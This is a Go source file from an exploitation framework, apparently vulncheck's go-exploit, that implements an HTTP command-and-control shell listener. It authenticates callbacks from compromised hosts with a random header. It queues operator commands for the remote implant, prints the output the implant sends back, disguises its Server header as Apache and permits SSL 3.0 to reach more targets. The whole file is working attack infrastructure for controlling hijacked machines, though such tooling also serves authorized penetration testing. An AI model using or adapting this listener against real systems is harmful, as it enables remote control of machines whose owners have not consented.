package httpshellserver

import (
	"bufio"
	"crypto/tls"
	"flag"
	"fmt"
	"io"
	"net/http"
	"os"
	"strings"
	"sync"
	"sync/atomic"
	"testing"
	"time"

	"github.com/vulncheck-oss/go-exploit/c2/channel"
	"github.com/vulncheck-oss/go-exploit/encryption"
	"github.com/vulncheck-oss/go-exploit/output"
	"github.com/vulncheck-oss/go-exploit/random"
)

var (
	singleton   *Server
	cliLock     sync.Mutex
	commandChan = make(chan string)
	lastSeen    time.Time
)

type Server struct {
	// The HTTP address to bind to
	HTTPAddr string
	// The HTTP port to bind to
	HTTPPort int
	// Set to the Server field in HTTP response
	ServerField string
	// Indicates if TLS should be enabled
	TLS bool
	// The file path to the user provided private key (if provided)
	PrivateKeyFile string
	// The file path to the user provided certificate (if provided)
	CertificateFile string
	// Loaded certificate
	Certificate tls.Certificate
	// Allows us to track if a connection has been received during the life of the server
	Success bool
	// Randomly generated during init, gives some sense of security where there is otherwise none.
	// This should appear in a header with the name VC-Auth
	AuthHeader string
	channel    *channel.Channel
}

// A basic singleton interface for the c2.
func GetInstance() *Server {
	if singleton == nil {
		singleton = new(Server)
	}

	return singleton
}

func (httpServer *Server) Init(channel *channel.Channel) bool {
	if channel.Shutdown == nil {
		// Initialize the shutdown atomic. This lets us not have to define it if the C2 is manually
		// configured.
		var shutdown atomic.Bool
		shutdown.Store(false)
		channel.Shutdown = &shutdown
	}
	if channel == nil {
		output.PrintFrameworkError("Channel passed to C2 init was nil, ensure that channel is assigned and the shutdown atomic is set to false")

		return false
	}
	httpServer.channel = channel
	if testing.Testing() {
		httpServer.AuthHeader = "testing-auth-header"
	} else {
		httpServer.AuthHeader = random.RandLetters(20)
	}
	if channel.IsClient {
		output.PrintFrameworkError("Called C2HTTPServer as a client. Use lhost and lport.")

		return false
	}

	switch {
	case channel.Port != 0:
		httpServer.HTTPAddr = channel.IPAddr
		httpServer.HTTPPort = channel.Port
	default:
		output.PrintFrameworkError("Called HTTPServeFile without specifying a bind port.")

		return false
	}

	if httpServer.TLS {
		var ok bool
		var err error
		if len(httpServer.CertificateFile) != 0 && len(httpServer.PrivateKeyFile) != 0 {
			httpServer.Certificate, err = tls.LoadX509KeyPair(httpServer.CertificateFile, httpServer.PrivateKeyFile)
			if err != nil {
				output.PrintfFrameworkError("Error loading certificate: %s", err.Error())

				return false
			}
		} else {
			output.PrintFrameworkStatus("Certificate not provided. Generating a TLS Certificate")
			httpServer.Certificate, ok = encryption.GenerateCertificate()
			if !ok {
				return false
			}
		}
	}

	return true
}

// User options for serving a file over HTTP as the "c2".
func (httpServer *Server) CreateFlags() {
	flag.StringVar(&httpServer.ServerField, "httpShellServer.ServerField", "Apache", "The value to insert in the HTTP server field")
	flag.BoolVar(&httpServer.TLS, "httpShellServer.TLS", false, "Indicates if the HTTP server should use encryption")
	flag.StringVar(&httpServer.PrivateKeyFile, "httpShellServer.PrivateKeyFile", "", "A private key to use with the HTTPS server")
	flag.StringVar(&httpServer.CertificateFile, "httpShellServer.CertificateFile", "", "The certificate to use with the HTTPS server")
}

// Get the underlying C2 channel with metadata and session information.
func (httpServer *Server) Channel() *channel.Channel {
	return httpServer.channel
}

// Shutdown the C2 server and cleanup all the sessions.
func (httpServer *Server) Shutdown() bool {
	// Account for non-running case
	if httpServer.Channel() == nil {
		return true
	}
	output.PrintFrameworkStatus("Shutting down the HTTP Server")
	if len(httpServer.Channel().Sessions) > 0 {
		for k := range httpServer.Channel().Sessions {
			httpServer.Channel().RemoveSession(k)
		}
	}

	return true
}

// start the HTTP server and listen for incoming requests for `httpServer.FileName`.
//
//nolint:gocognit
func (httpServer *Server) Run(timeout int) {
	http.HandleFunc("/rx", func(writer http.ResponseWriter, req *http.Request) {
		authHeader := req.Header.Get("Vc-Auth")
		if authHeader != httpServer.AuthHeader {
			writer.WriteHeader(http.StatusForbidden)
			output.PrintfFrameworkDebug("Auth header mismatch from %s: %s, should be %s", req.RemoteAddr, req.Header.Get("Vc-Auth"), httpServer.AuthHeader)

			return
		}

		body, _ := io.ReadAll(req.Body)
		if strings.TrimSpace(string(body)) != "" {
			output.PrintShell(fmt.Sprintf("%s: %s", req.RemoteAddr, string(body)))
		}
	})

	http.HandleFunc("/", func(writer http.ResponseWriter, req *http.Request) {
		authHeader := req.Header.Get("Vc-Auth")
		if authHeader != httpServer.AuthHeader {
			writer.WriteHeader(http.StatusForbidden)
			output.PrintfFrameworkDebug("Auth header mismatch from %s: %s, should be %s", req.RemoteAddr, req.Header.Get("Vc-Auth"), httpServer.AuthHeader)

			return
		}
		lastSeen = time.Now()
		writer.Header().Set("Server", httpServer.ServerField)

		if !httpServer.Success {
			go func() {
				httpServer.Success = true
				httpServer.Channel().AddSession(nil, req.RemoteAddr)
				output.PrintfSuccess("Received initial connection from %s, entering shell", req.RemoteAddr)
				cliLock.Lock()
				defer cliLock.Unlock()
				for {
					elapsed := time.Since(lastSeen)
					if elapsed/time.Millisecond > 10000 {
						fmt.Printf("last seen: %ds> ", time.Since(lastSeen)/time.Second)
					} else {
						fmt.Printf("last seen: %dms> ", time.Since(lastSeen)/time.Millisecond)
					}
					reader := bufio.NewReader(os.Stdin)
					command, _ := reader.ReadString('\n')
					trimmedCommand := strings.TrimSpace(command)
					if trimmedCommand == "help" {
						fmt.Printf("Usage:\nType a command and it will be added to the queue to be distributed to the first connection\ntype exit to shut everything down.\n")

						continue
					}
					if trimmedCommand == "exit" {
						output.PrintStatus("Exit received, shutting down")
						httpServer.Channel().Shutdown.Store(true)

						return
					}
					if strings.TrimSpace(command) != "" {
						commandChan <- strings.TrimSpace(command)
					}
				}
			}()
		}

		select {
		case command := <-commandChan:
			writer.WriteHeader(http.StatusOK)
			fmt.Fprint(writer, command)
		default:
			writer.WriteHeader(http.StatusOK)
		}
	})

	var wg sync.WaitGroup
	connectionString := fmt.Sprintf("%s:%d", httpServer.HTTPAddr, httpServer.HTTPPort)
	wg.Add(1)
	go func() {
		if httpServer.TLS {
			output.PrintfFrameworkStatus("Starting an HTTPS server on %s...", connectionString)
			tlsConfig := &tls.Config{
				Certificates: []tls.Certificate{httpServer.Certificate},
				// We have no control over the SSL versions supported on the remote target. Be permissive for more targets.
				//nolint
				MinVersion: tls.VersionSSL30,
			}
			server := http.Server{
				Addr:      connectionString,
				TLSConfig: tlsConfig,
				// required to disable HTTP/2 according to https://pkg.go.dev/net/http#hdr-HTTP_2
				TLSNextProto: make(map[string]func(*http.Server, *tls.Conn, http.Handler), 1),
			}
			defer server.Close()
			// Track if the server has signaled for shutdown and if so mark the waitgroup and trigger shutdown
			go func() {
				for {
					if httpServer.Channel().Shutdown.Load() {
						httpServer.Shutdown()
						server.Close()
						wg.Done()

						break
					}
					time.Sleep(10 * time.Millisecond)
				}
			}()
			// Handle timeouts
			go func() {
				time.Sleep(time.Duration(timeout) * time.Second)
				if !httpServer.Channel().HasSessions() {
					output.PrintFrameworkError("Timeout met. Shutting down shell listener.")
					httpServer.channel.Shutdown.Store(true)
				}
			}()
			_ = server.ListenAndServeTLS("", "")
		} else {
			output.PrintfFrameworkStatus("Starting an HTTP server on %s", connectionString)
			server := http.Server{
				Addr: connectionString,
			}
			defer server.Close()
			// Track if the server has signaled for shutdown and if so mark the waitgroup and trigger shutdown
			go func() {
				for {
					if httpServer.Channel().Shutdown.Load() {
						server.Close()
						httpServer.Shutdown()
						wg.Done()

						break
					}
					time.Sleep(10 * time.Millisecond)
				}
			}()
			// Handle timeouts
			go func() {
				time.Sleep(time.Duration(timeout) * time.Second)
				if !httpServer.Channel().HasSessions() {
					output.PrintFrameworkError("Timeout met. Shutting down shell listener.")
					httpServer.channel.Shutdown.Store(true)
				}
			}()
			_ = server.ListenAndServe()
		}
	}()

	wg.Wait()
	httpServer.Channel().Shutdown.Store(true)
}
